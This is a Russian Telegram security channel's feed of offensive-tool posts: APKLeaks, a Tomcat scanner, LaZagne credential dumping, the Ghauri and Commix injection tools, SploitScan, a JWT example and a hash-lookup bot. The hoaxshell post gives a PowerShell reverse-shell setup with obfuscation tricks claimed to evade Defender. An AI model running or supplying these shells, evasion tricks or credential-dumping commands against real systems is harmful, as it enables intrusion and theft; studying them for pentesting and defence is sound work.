Whitehat Lab
1.85K subscribers
323 photos
368 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
🔄🤖 APKLeaks v2.6.3

Сканер APK файлов на различные секреты, ссылки и эндпоинты. Написан на 🐍 Python

Установка:

pip3 install apkleaks

Запуск:

apkleaks -f ~/path/to/file.apk

💻 Home

#apkleaks #soft #python #reverse

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
💻ApacheTomcatScanner v3.7.2

Узкоспециализированный инструмент написанный на 💻 python для поиска уязвимостей веб-сервера Apache Tomcat

Установка
:

sudo python3 -m pip install apachetomcatscanner


Запуск:

ApacheTomcatScanner -tt 172.16.0.10 -tp - —-list-cves


▪️ Проверка доступности
▪️ Многопоточность
▪️ Проверка стандартных УД
▪️ Определение версии
▪️ Список уязвимостей и CVE
▪️ Поддержка прокси
▪️ Экспорт в xlsx, json, sqlite

💻 Download

#tomcat #apache #apachetomcatscanner #soft #python

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 📞 The LaZagne Project v2.4.6

Инструмент для восстановления забытых 😄 паролей, написан на Python 💻 На самом деле средство пост эксплуатации, поддерживается большое количество программ: браузеры, IM, почтовые клиенты.

📌 Список

Примеры использования:

laZagne.exe all
laZagne.exe browsers -firefox
laZagne.exe all -oA -output C:\Users\test\Desktop
laZagne.exe all -quiet -oA
laZagne.exe all -password Password


💻 Home
💻 Download

#lazagne #python #password #recovery #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 💻 Ghauri v1.4.2

🔺 Продвинутый кроссплатформенный инструмент, автоматизирующий процесс обнаружения и эксплуатации 🔥 SQL-инъекций.
Если вкратце то SQLMap на минималках 😃
Проект интересный. С простенькими заданиями справился, что приятно удивило!

Поддерживаемые техники:

Boolean based
Error Based
Time Based
Stacked Queries


Поддерживаемые СУБД:

MySQL
Microsoft SQL Server
Postgres
Oracle


Поддерживаемые типы:

GET/POST
Headers
Cookies
Mulitipart Form data
JSON
SOAP/XML


⚙️ Установка и запуск:

git clone https://github.com/r0oth3x49/ghauri.git

python3 -m pip install --upgrade -r requirements.txt


python3 setup.py install

ghauri -u 'http://62.173.140.174:16015/user.php?login=asd&password=asd' --batch -v 2 --dbs

💻 Download

#ghauri #sqli #sqlinjection #python #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🧩 hoaxshell

Генератор и обработчик полезной нагрузки для Windows через PowerShell. Написан на Python
Бонус: при небольшой обработке "напильником" обходим последний Defender со всеми апдейтами (см. картинку)

Установка:

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt


Примеры:
python3 hoaxshell.py -s 192.168.1.36 -iro -H "Authorization"


-i
- Invoke-RestMethod вместо Invoke-WebRequest
-r - Без кодирования в Base64
Нет смысла кодировать т.к. дорабатывать будем руками, все дефолтные методы "палятся" АВ
-o - Обфускация

Полезные ключи -ng и -lt для создания ngrok или localtunnel сессии

Ручная обфускация:

Надо заменить Invoke-RestMethod и Invoke-WebRequest на аналоги и/или напихать кавычек. Мы же любим кавычки ? 😃

Примеры:

i''nV''okE-R''eStMe''Th''oD
ir''M
i''eX
Ir''M

С реГисТром можно и нужно играться

😹 Home

#hoaxshell #powershell #python #soft #manual

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 💉 Commix v4.0-stable

UPD. Большой апдейт до major ветки 4.0

Комбайн для эксплуатации Command Injection уязвимостей, написан на python 💻 Команды, ключи, вывод и все остальное очень похоже на SQLMap.

В 🐧 Kali предустановлен.

💻 Установка:

git clone https://github.com/commixproject/commix.git commix
python commix.py -h


"Детский" режим:

python commix --wizard


Обычный запуск:

python commix -u http://62.173.140.174:16016/ --data 'action='


Поддержка тамперов:

python commix -u http://62.173.140.174:16016/ --data 'action=' --tamper=space2ifs


Список тамперов:

python commix --list-tampers

💻 Download
⚙️ Usage examples

#commix #python #pentest #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⚙️Онлайн инструменты для работы с JWT

JSON Web Token - специальный формат токена, который позволяет безопасно(в идеале 😁) передавать данные между клиентом и сервером.

Состоит из трёх частей: заголовок, пейлоад и подпись

➡️Мой любимый - https://token.dev
➡️По классике - https://jwt.io
➡️Еще неплохой вариант
➡️Отдельно декодер для Flask Session Cookie

Пример простейшей реализации на Python 🐍

import json
import hmac
import hashlib
import base64
import uuid

header = {"typ": "JWT", "alg": "HS256"}
payload = {"name": "exited3n", "isAdmin": True}
secret = str(uuid.uuid4())


def jwt_gen(header: dict, payload: dict, secret: str) -> bytes:
jwt_parts = []
json_header = json.dumps(header).encode()
json_payload = json.dumps(payload).encode()
jwt_parts.append(base64.urlsafe_b64encode(json_header))
jwt_parts.append(base64.urlsafe_b64encode(json_payload))

merge_payload_header = b'.'.join(jwt_parts)

signature = hmac.new(secret.encode(), merge_payload_header, hashlib.sha256).digest()
jwt_parts.append(base64.urlsafe_b64encode(signature))

return b'.'.join(jwt_parts)

print(f'Secret: {secret}')
print(jwt_gen(header, payload, secret))


#jwt #token #flask #python

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⚙️SploitScan v0.13.0

Нашел отличный и удобный инструмент, предназначенный для поиска эксплоитов, известных уязвимостей и их эксплуатации с поддержкой 👩‍💻 AI (ChatGPT, Gemini, Grok и DeepSeek) и функцией импорта из популярных 😁 сканеров

Установка в 🐧 Debian like:

sudo apt install sploitscan


В репозиториях не самая новая версия, поэтому рекомендую ставить с гитхаба.

😹 Github:

git clone https://github.com/xaitax/SploitScan.git
cd sploitscan
pip install -r requirements.txt


PyPi:

pip install --user sploitscan


Источники PoC'ов:

➡️GitHub
➡️ExploitDB
➡️VulnCheck (нужен free API key)
➡️Packet Storm
➡️Nuclei


Импорт из:

Nessus (.nessus)
Nexpose (.xml)
OpenVAS (.xml)
Docker (.json)


В конфиге указываем API ключи поддерживаемых сервисов (config.json)

{
"vulncheck_api_key": "",
"openai_api_key": "",
"google_api_key": "",
"grok_api_key": "",
"deepseek_api_key": ""
}


Поиск по CVE:

sploitscan CVE-2024-1709
sploitscan CVE-2024-1709 CVE-2024-21413


Поиск по ключевым словам:

sploitscan -k "Outlook Express"


Импорт и экспорт:

sploitscan --import-file path/to/yourfile.nessus --type nessus

sploitscan CVE-2024-1709 -e {json,csv,html}


Помощь AI:

sploitscan --ai openai CVE-2024-21413

┌───[ 🤖 AI-Powered Risk Assessment ]
|
| 1. Risk Assessment
| -------------------
| ...
| 2. Potential Attack Scenarios
| ------------------------------
| ...
| 3. Mitigation Recommendations
| ------------------------------
| ...
| 4. Executive Summary
| ---------------------
| ...


#sploitscan #poc #cve #python

💻 Github

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🗝️ Weakpass

Недавно был пост об отличном сервисе Weakpass у которого в наличии абсолютно бесплатный API

Прикрутил к боту Password lookup (MD5, NTLM, SHA1 или SHA256)

import requests
from aiogram import Router, F
from aiogram.types import Message
import logging
import app.config.cfg as cfg
import json

router: Router = Router()


def check_hash_string(hash_string: str):
try:
headers = {'Content-Type': 'application/json'}
url = requests.get(f'https://weakpass.com/api/v1/search/{hash_string}.json', headers=headers)
output = json.loads(url.text)
hash_info = json.dumps(output, indent=2)
return hash_info
except Exception as e:
logging.warning(e)

@router.message(F.text.startswith(cfg.all_commands['check_hash']))
async def check_hash(message: Message):
try:
msg = message.text.split()
if len(msg) == 2:
await message.answer(f'<b>{check_hash_string(msg[1])}</b>', disable_web_page_preview=True)
else:
await message.answer(f'Пример:\n<code>!check_hash 5f4dcc3b5aa765d61d8327deb882cf99</code>')
except Exception as e:
logging.warning(e)


Работает в чате канала

!check_hash 5f4dcc3b5aa765d61d8327deb882cf99

➡️ Home
➡️ Wordlists
➡️ API
💻 Github

#weakpass #api #bot #python

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM